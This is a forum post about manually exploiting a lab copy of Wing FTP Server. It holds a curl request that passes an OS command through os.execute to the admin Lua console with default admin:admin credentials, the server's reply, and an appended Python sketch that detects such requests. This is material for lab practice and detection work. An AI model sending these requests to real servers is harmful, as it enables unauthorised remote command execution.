Exploiting Wing FTP Server without Metasploit. curl Expert R

JosephFrench
Posts: 1
Joined: Fri Jul 24, 2020 9:49 am

Post by JosephFrench »

Hi guys,

I'm going through a hack-the-box type provider and they have a box that has a vulnerable copy of Wing FTP Server. It's easily exploitable using Metasploit: https://www.exploit-db.com/exploits/34517

However, I would like to complete their 'extra mile' challenge by exploiting the service manually. I figured this could be done using curl. This is my attempt:

Code:

curl -i -s -k -u admin:admin -b 'UIDADMIN=adsfasdfasdfasdfasdfasdf' -X POST --data-binary $'command=os.execute(\'cmd.exe /c pwd\')' "http://10.1.1.1:5466/admin_lua_script.html"

However, it's not completing the command. Does anyone know where I'm going wrong?

Edit: All I ever get back is

Code:

HTTP/1.0 200 HTTP OK
Server: Wing FTP Server(Ferdi Bak)
Cache-Control: private
Content-Type: text/html
Content-Length: 0
Connection: close

Thank you
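Seen from the server operator's side, the request quoted in the post has a recognizable shape: a POST to admin_lua_script.html whose command parameter calls os.execute, sent with the admin:admin pair. The following detection sketch is an added example, not part of the original post and not Wing FTP Server code; the captured request, the label names and the extra io.popen pattern are assumptions made for illustration.

```python
import base64
import re
from urllib.parse import unquote_plus

CONSOLE_PATH = "/admin_lua_script.html"                    # path from the post
RISKY_LUA = re.compile(r"\b(os\.execute|io\.popen)\s*\(")  # io.popen added here
DEFAULT_CREDS = {"admin:admin"}                            # pair used in the post

# Constructed request, modelled on the curl command quoted in the post.
SAMPLE = (
    "POST /admin_lua_script.html HTTP/1.1\r\n"
    "Host: 10.1.1.1:5466\r\n"
    "Authorization: Basic YWRtaW46YWRtaW4=\r\n"
    "Cookie: UIDADMIN=adsfasdfasdfasdfasdfasdf\r\n"
    "\r\n"
    "command=os.execute('cmd.exe /c pwd')"
)

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body

def findings(raw):
    """Return detection labels for one request; empty list if not the console."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != CONSOLE_PATH:
        return []
    out = ["lua-console-request"]
    # The body may arrive as typed (curl --data-binary) or percent-encoded.
    m = re.search(r"(?:^|&)command=(.*)", body, re.S)
    if m and RISKY_LUA.search(unquote_plus(m.group(1))):
        out.append("lua-process-execution")
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            creds = base64.b64decode(auth[6:]).decode("utf-8", "replace")
        except ValueError:
            creds = ""
        if creds in DEFAULT_CREDS:
            out.append("default-admin-credentials")
    return out

if __name__ == "__main__":
    print(findings(SAMPLE))
```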